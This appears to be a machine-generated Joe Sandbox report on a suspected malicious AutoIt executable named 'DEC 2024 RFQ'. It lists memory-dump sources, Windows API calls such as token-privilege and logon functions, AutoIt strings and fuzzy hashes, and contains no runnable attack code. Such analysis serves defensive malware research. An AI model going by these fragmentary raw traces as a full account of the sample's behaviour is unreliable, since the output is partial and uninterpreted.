                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 07fdd7d8e70c7c45b8a1d0a5916707c862edc4d807d5f8a603d026bfb5d9b454
                                                                                                                      • Instruction ID: 6d126f20de8c79d5b29a952e0d844d30e19687b55f4e1b1b388b38835b7dbde5
                                                                                                                      • Opcode Fuzzy Hash: 07fdd7d8e70c7c45b8a1d0a5916707c862edc4d807d5f8a603d026bfb5d9b454
                                                                                                                      • Instruction Fuzzy Hash: 37F0823520522DABEB21AFA4DC48FEA776CBF09362F004166F949D6181D670AA44CBA1
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00078309), ref: 000781E0
                                                                                                                      • CloseHandle.KERNEL32(?,?,00078309), ref: 000781F2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: a46d6eff7548ff0d64bdc03db9a79f32c9315f5d6847ba13659133b143cc0ff0
                                                                                                                      • Instruction ID: c69286e69e2d681445ed975dd6596a7de2018d9679685b7415cd666ce47bdb68
                                                                                                                      • Opcode Fuzzy Hash: a46d6eff7548ff0d64bdc03db9a79f32c9315f5d6847ba13659133b143cc0ff0
                                                                                                                      • Instruction Fuzzy Hash: 6FE04672010A11AEEB212B62EC08DB37BEEEB00310710886DB9A684431CB32ACA0DB14
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00048D57,?,?,?,00000001), ref: 0004A15A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0004A163
Strings
• Variable must be of type 'Object'., xrefs: 00063E62
APIs
• __time64.LIBCMT ref: 0008889B
  • Part of subcall function 0004520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00088F6E,00000000,?,?,?,?,0008911F,00000000,?), ref: 00045213
  • Part of subcall function 0004520A: __aulldiv.LIBCMT ref: 00045233
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00084C4A
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00078389), ref: 000787D1
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0004A12A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 0bb39d376d1f8ef43fcbe03ac48761fadad4f7302f9007889786d5d61363de59
                                                                                                                      • Instruction ID: 1b875fd39ac93c63c5ac2bdcce6490b8030891be5f9fdd52e8e2afb2f633c5fe
                                                                                                                      • Opcode Fuzzy Hash: 0bb39d376d1f8ef43fcbe03ac48761fadad4f7302f9007889786d5d61363de59
                                                                                                                      • Instruction Fuzzy Hash: 38A0123100010DA78F001B81EC044547F5CD7011907004020F40C4002187B255104580
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6b34bc305015a33658becb955f63181b1a05b5d4a3799b99dddcf22289dede9
                                                                                                                      • Instruction ID: 6622831e838c258a027f79fe7966f4a067c01a989f8d1c2df9c62208af205bf6
                                                                                                                      • Opcode Fuzzy Hash: a6b34bc305015a33658becb955f63181b1a05b5d4a3799b99dddcf22289dede9
                                                                                                                      • Instruction Fuzzy Hash: CF223930904746CBEF7A8A14C8947BC77E5FB01306F68C0ABF94A87592DBB89D91C752
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• DeleteObject.GDI32(00000000), ref: 0009785B
• DeleteObject.GDI32(00000000), ref: 0009786D
• DestroyWindow.USER32 ref: 0009787B
• GetDesktopWindow.USER32 ref: 00097895
• GetWindowRect.USER32(00000000), ref: 0009789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000979DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000979ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097A35
• GetClientRect.USER32(00000000,?), ref: 00097A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00097A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097ABB
• GlobalLock.KERNEL32(00000000), ref: 00097AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00097ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AE3
• GlobalFree.KERNEL32(00000000), ref: 00097AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,000B2CAC,00000000), ref: 00097B16
• GlobalFree.KERNEL32(00000000), ref: 00097B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00097B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00097B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097D7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
APIs
• CharUpperBuffW.USER32(?,?,000AF910), ref: 000A3627
• IsWindowVisible.USER32(?), ref: 000A364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
APIs
• SetTextColor.GDI32(?,00000000), ref: 000AA630
• GetSysColorBrush.USER32(0000000F), ref: 000AA661
• GetSysColor.USER32(0000000F), ref: 000AA66D
• SetBkColor.GDI32(?,000000FF), ref: 000AA687
• SelectObject.GDI32(?,00000000), ref: 000AA696
• InflateRect.USER32(?,000000FF,000000FF), ref: 000AA6C1
• GetSysColor.USER32(00000010), ref: 000AA6C9
• CreateSolidBrush.GDI32(00000000), ref: 000AA6D0
• FrameRect.USER32(?,?,00000000), ref: 000AA6DF
• DeleteObject.GDI32(00000000), ref: 000AA6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 000AA731
• FillRect.USER32(?,?,00000000), ref: 000AA763
• GetWindowLongW.USER32(?,000000F0), ref: 000AA78E
  • Part of subcall function 000AA8CA: GetSysColor.USER32(00000012), ref: 000AA903
  • Part of subcall function 000AA8CA: SetTextColor.GDI32(?,?), ref: 000AA907
  • Part of subcall function 000AA8CA: GetSysColorBrush.USER32(0000000F), ref: 000AA91D
  • Part of subcall function 000AA8CA: GetSysColor.USER32(0000000F), ref: 000AA928
  • Part of subcall function 000AA8CA: GetSysColor.USER32(00000011), ref: 000AA945
  • Part of subcall function 000AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000AA953
  • Part of subcall function 000AA8CA: SelectObject.GDI32(?,00000000), ref: 000AA964
  • Part of subcall function 000AA8CA: SetBkColor.GDI32(?,00000000), ref: 000AA96D
  • Part of subcall function 000AA8CA: SelectObject.GDI32(?,?), ref: 000AA97A
  • Part of subcall function 000AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 000AA999
  • Part of subcall function 000AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000AA9B0
                                                                                                                        • Part of subcall function 000AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 000AA9C5
                                                                                                                        • Part of subcall function 000AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000AA9ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3521893082-0
                                                                                                                      • Opcode ID: 3b9a99138c5cb73c79af4052d509dff167da371326c6d4a16d93cc4b623a958f
                                                                                                                      • Instruction ID: e07283099faf9495aa7523544539ca330ae182e189d04fdc51f88dddca97db60
                                                                                                                      • Opcode Fuzzy Hash: 3b9a99138c5cb73c79af4052d509dff167da371326c6d4a16d93cc4b623a958f
                                                                                                                      • Instruction Fuzzy Hash: E9917F71508B02AFD7509FA4DC08E6B7BE9FF4A321F100B29F5A2961E1D739D944CB52
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00022CA2
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00022CE8
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00022CF3
                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00022CFE
                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00022D09
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0005C43B
                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0005C474
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0005C89D
                                                                                                                        • Part of subcall function 00021B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00022036,?,00000000,?,?,?,?,000216CB,00000000,?), ref: 00021B9A
                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 0005C8DA
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0005C8F1
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0005C907
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0005C912
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                      • Opcode ID: 41d8d4ccd571d7278fa01f39f47a24e1411788203c677426cd7b692b5800aba0
                                                                                                                      • Instruction ID: 9e758af856008e91de67ae4732913668dc77afdd3da210e509bf325050dbfa8f
                                                                                                                      • Opcode Fuzzy Hash: 41d8d4ccd571d7278fa01f39f47a24e1411788203c677426cd7b692b5800aba0
                                                                                                                      • Instruction Fuzzy Hash: B712AD30604611AFEB65CF64D884FAAB7E5FF09311F644569F885CB262C731E886CB91
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 000974DE
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0009759D
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000975DB
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000975ED
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00097633
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0009763F
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00097683
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00097692
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000976A2
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000976A6
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000976B6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000976BF
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 000976C8
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000976F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0009770B
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00097746
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0009775A
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0009776B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0009779B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000977A6
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000977B1
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000977BB
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 68206ac0bac2c628b694699e4032ebc38e757df9307ca98debf148df8d9e9949
                                                                                                                      • Instruction ID: 192e448e9971e152f5a00f46e668161e93cd2456b8e8eb2bf68e8fca37429108
                                                                                                                      • Opcode Fuzzy Hash: 68206ac0bac2c628b694699e4032ebc38e757df9307ca98debf148df8d9e9949
                                                                                                                      • Instruction Fuzzy Hash: 35A19071A00615BFEB14DBA4DC4AFBE7BB9EB05715F004118FA14AB2E1C774AD00CB64
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008AD1E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,000AFAC0,?,\\.\,000AF910), ref: 0008ADFB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,000AFAC0,?,\\.\,000AF910), ref: 0008AF59
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: 824735435fa31637ca9d51b2829d79da38fa7f4c8d25e06e8e1ff536770bd9d3
                                                                                                                      • Instruction ID: 73beef95f2ee32224dd5ad163c1a348b2b24d34215f5bcaa68848364cc3b0ae5
                                                                                                                      • Opcode Fuzzy Hash: 824735435fa31637ca9d51b2829d79da38fa7f4c8d25e06e8e1ff536770bd9d3
                                                                                                                      • Instruction Fuzzy Hash: 5D51A6B0744305ABAB50FB94C942DBD73A0FB4A710B208467E687ABB93DB709D41DB53
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: f59187f97923196b67e516548a845cf7c7b779f720b973be1e54002043791696
                                                                                                                      • Instruction ID: e54989272d022d33a7bff3adb214c612d8564084ebd1a52b305afcca771e8f19
                                                                                                                      • Opcode Fuzzy Hash: f59187f97923196b67e516548a845cf7c7b779f720b973be1e54002043791696
                                                                                                                      • Instruction Fuzzy Hash: 8C8106B1600225AACB25AA60EC86FFF77ACAF05700F045035FD45AB193EB72DE45C6A5
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 000AA903
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000AA907
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000AA91D
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000AA928
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 000AA92D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000AA945
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000AA953
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000AA964
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000AA96D
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000AA97A
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000AA999
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000AA9B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000AA9C5
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000AA9ED
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000AAA14
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 000AAA32
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 000AAA3D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 000AAA4B
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000AAA53
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000AAA67
                                                                                                                      • SelectObject.GDI32(?,000AA5FA), ref: 000AAA7E
                                                                                                                      • DeleteObject.GDI32(?), ref: 000AAA89
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000AAA8F
                                                                                                                      • DeleteObject.GDI32(?), ref: 000AAA94
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000AAA9A
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 000AAAA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000A8AC1
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A8AD2
                                                                                                                      • CharNextW.USER32(0000014E), ref: 000A8B01
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000A8B42
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000A8B58
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A8B69
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000A8B86
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 000A8BD8
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000A8BEE
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000A8C1F
                                                                                                                      • _memset.LIBCMT ref: 000A8C44
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000A8C8D
                                                                                                                      • _memset.LIBCMT ref: 000A8CEC
